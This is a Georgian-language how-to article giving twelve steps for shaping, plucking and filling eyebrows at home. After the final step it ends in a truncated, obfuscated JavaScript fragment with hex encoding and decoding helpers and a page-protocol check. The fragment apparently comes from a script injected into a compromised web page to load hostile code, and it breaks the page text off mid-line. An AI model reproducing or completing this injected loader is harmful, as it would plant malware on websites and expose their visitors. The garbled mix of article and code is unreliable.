ნუ დაგენანებათ დროის ხარჯვა წარბების გაკეთებაზე. მოვლილი და იდეალური წარბი გამოკვეთავს სახის ნაკვთებს და ხაზს გაუსვამს თვალების სილამაზეს.
თუ ადამიანების იმ კატეგორიას მიეკუთვნებით, ვინც ყოველთვიურად სალონში დადის წარბის გასაკეთებლად, ეს ინფორმაცია თქვენთვისაა. ჩვენი რეკომენდაციების გათვალისწინებით იდეალური ფორმის წარბებს თავადაც გაიკეთებთ.
1. გადააბრუნეთ პინცეტი
პინცეტი (დახურული მხრიდან) ვერტიკალურად ცხვირისა და წარბის კიდეზე მიიდეთ. წერტილი, სადაც პინცეტი წარბს ედება, წარბის დაწყების ადგილია. დაიმახსოვრეთ ეს.
2. მოამზადეთ ფანქარი
პირველი პუნქტის შესრულების შემდეგ გამოიყენეთ ფანქარი, რათა ვერტიკალური ხაზი გაავლოთ წარბის საწყისი წერტილიდან. შეამოწმეთ მანძილი წარბებს შორის და ზედმეტი თმა ამოიპუტეთ.
3. ამოიქენით სწორად
თმის ფესვიდან ამოღებასაც ცოდნა უნდა. აკურატულად და ფრთხილად უნდა იმოქმედოთ. მოკიდეთ პინცეტი თმას ფესვთან ახლოს და ამოიღეთ.
4. განსაზღვრეთ წარბის უკიდურესი წერტილი
ამისთვისაც პინცეტი უნდა გამოიყენოთ. მისი ქვედა ნაწილი ნესტოსთან მიიდეთ და დიაგონალზე თვალის კუთხესთან გაიჩერეთ (იხ. ფოტო). პინცეტის ზედა მხარე წარბის ბოლო წერტილი უნდა იყოს. დააფიქსირეთ ეს ადგილი.
5. მოიშორეთ ყველა ზედმეტი თმა
თქვენ იცით სად უნდა იწყებოდეს და მთავრდებოდეს წარბი. ახლა ამოიღეთ ყველა ზედმეტი თმა.
6. განსაზღვრეთ წარბის სასურველი სისქე
გამოიყენეთ წარბის ფანქარი, წერტილით აღნიშნეთ წარბის ყველაზე ხშირი ადგილი, სადაც იწყება და დასასრულის წერტილი. წარბის ბუნებრივ რკალს მიჰყვევით და წერტილები ხაზით შეაერთეთ.
7. გაასუფთავეთ ქუთუთო
ამოიპუტეთ ყველა ის თმა, რომელიც ხაზის ქვემოთ, თვალისკენ დარჩა.
8. იდეალური ზომა
საბოლოო შედეგი ასეთი უნდა იყოს: 6,5 მმ-იდან 1,2 სმ სიგანეში. იგი დამოკიდებულია სახის ფორმასა და პირად მოსაზრებებზე.
9. იდეალური ტეხილი
ტეხილი თვალის ფერადი გარსის უკიდურესი წერტილის ზემოთ უნდა იწყებოდეს. დასვით წერტილი და იდეალური ტეხილის მისაღებად ამოიპუტეთ ყველა ზედმეტი თმა.
10. შედეგის გასაუმჯობესებლად
თუ ამპუტული თმის შემდეგ წარბი იდეალურად არ გამოიყურება, გამოიყენეთ წარბის კორექტორი. შტრიხები გაიკეთეთ თმის ფესვიდან ზრდის მიმართულებით.
11. ნუ შეგეშინდებათ წარბების შეღებვა
თუ ფერის გამოკვეთა გსურთ, წარბის ფანქარი გამოიყენთ, ნურც ჩრდილების გამოყენებას შეუშინდებით მთავარია, წარბი მთელ სიგრძეზე იყოს დაფარული.
12. საფინალო შტრიხი
ყველა მითითების შესრულების შემდეგ არ დაგავიწყდეთ წარბებზე ფიქსატორი გელის გადასმა, რათა დიდი ხნით შეინარჩუნოთ ფორმა.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o ar w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e